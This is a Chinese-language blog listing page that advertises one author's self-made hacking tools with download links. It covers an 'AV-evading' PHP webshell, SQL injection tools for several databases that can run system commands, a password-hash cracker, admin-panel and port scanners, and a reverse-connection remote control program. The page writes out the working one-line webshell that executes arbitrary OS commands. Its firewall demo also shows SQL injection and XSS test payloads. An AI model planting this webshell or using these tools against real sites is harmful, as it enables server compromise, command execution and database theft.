预览模式: 普通 | 列表

【河马】 php一句话木马服务端和客户端【免杀版】

软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>

写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,

支持的函数有system,shell_exec,passthru

点击这里下载

Tags: 远控

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2150

河马Mysql 注入工具[升级版]v1.1

如果存在php+mysql数据库的注入点,asp+mysql数据库的注入点,jsp+mysql数据库的注入点,

1. 可以列表,字段,数据可以从网页文本中获取数据,也可以从http头里获取数据(这个是别的同类软件没有的)

2. 支持错误模式注入。

3. 支持身份认证。

4.附带一个编码转换功能,可以进行ascii,十六进制。

5. url编码和解码。

6. base64编码和解码。

速度很快,一款不错的工具。

作者:赵显阳

点击这里下载

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2865

【河马】Oracle密码还原工具v1.0

这款工具用于网络管理员评估自己的oracle数据库密码是否强壮,

也可以在通过sql注入获取了oracle的的密码哈希时还原出明文来,

扩大渗透范围等。有什么疑问欢迎咨询,我的QQ:343561636.

点击这里下载

Tags: hash破解

分类:oracle密码破解 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1612

河马PostgreSQL数据库专用注入工具v1.0

如果存在php+postgresql数据库的注入点,或asp+postgresql数据库的注入点,

或jsp+postgresql数据库的注入点,就可以利用本工具,查询表,字段,数据,并且

可以读取文件内容,

 

 

速度很快,一款不错的工具,值得收藏。

 

点击这里下载

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3530

河马网站Cookie修改器

一款修改Cookie的工具

点击这里下载

Tags: Cookie

分类:Cookie修改器 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1954

河马SQLServer数据库专用注入工具v1.0

利用前提,存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,

或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,并且

可以执行系统cmd命令和显示主机系统目录列表,这个工具有一个亮点是支持cookie

和身份验证。

 

 

速度很快,一款不错的工具,值得收藏。

这是网上唯一一款支持cookie的注入工具。

作者:赵显阳

点击这里下载

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2118

河马网站后台扫描器v1.0

 

知道网站域名,不知道怎么利用的用这个工具,它可以扫描网站的管理后台,

作者对使用该工具造成的负面后果,不承担任何责任。

点击这里下载

Tags: 扫描器

分类:网站后台扫描器 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1900

河马MySQL注入工具v1.0

 

如果存在php+mysql数据库的注入点,可以列表,字段,数据

可以从网页文本中获取数据,也可以从http头里获取数据(这个是别的同类软件没有的)

附带一个编码转换功能,可以进行ascii,十六进制,url编码和解码,base64编码和解码。

速度很快,一款不错的工具,值得收藏,

作者:赵显阳

点击这里下载

 

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2659

Oracle反弹注入工具v1.0

利用前提,存在oracle数据库的注入点,可以列表,字段,数据 

使用utl_http.request()方法获取数据,必须是对方的机器能直接连接本机ip

点击这里下载

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2723

河马多线程端口扫描器v1.1

 

大家好,今天给大家带来我新写的扫描器
河马多线程端口扫描器v1.1

使用方法:
1.设置要扫描的IP地址
在开始IP处输入IP段的起始IP地址
在结束IP处输入IP段的结束IP地址,

输入完成后点击->按钮。

2. 设置要扫描的端口

很简单我就不说了,

3. 设置完成后点击“开始扫描”按钮,就行了 。
   那个电脑图形一闪一闪表示正在扫描中。
   
    正在扫描中。。。

 

 

   完。。。
河马多线程端口扫描器v1.1

作者:赵显阳
QQ: 343561636

点击这里下载

Tags: 扫描器

分类:端口扫描器 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1597

河马Web应用防火墙v1.0

大家好,

今天给大家带来了我的新作品,iis web应用防火墙,

具有防sql注入攻击和防跨站脚本攻击的功能。

看安装动画

重启一下iis

安装完成后看我测试

http://192.168.16.186/quit.asp 这是一个正常页面


http://192.168.16.186/quit.asp?id=654321'  在连接的最后加单引号 系统报错
防火墙检测到SQL注入攻击

<A href="http://192.168.16.186/quit.asp?id=654321http://192.168.16.186/quit.asp?id=654321<script>alert(/xss)</script>
防火墙检测到跨站脚本(xss)攻击

 

 

 

作者:赵显阳

qq: 343561636

email:zhaoxypass@yahoo.com.cn

版本:v 1.0

2010-7-23

点击这里下载

 

Tags: 防火墙

分类:Web应用防火墙 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1606

河马Oracle数据库Sid猜解器v1.0

河马Oracle数据库Sid猜解器v1.0,用于对oracle数据库进行安全评估。

通过字典方式猜解oracle的sid

点击这里下载

查看更多...

Tags: 数据库

分类:数据库口令破解 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1881

河马远控3.0

 

 大家好,今天给大家带来一款我自主开发的 采用反弹端口技术 远程控制软件

该版本主要实现了文件传输功能,可自由上传,下载大文件。

使用方法如下

查看更多...

Tags: 远控

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2191
无标题文档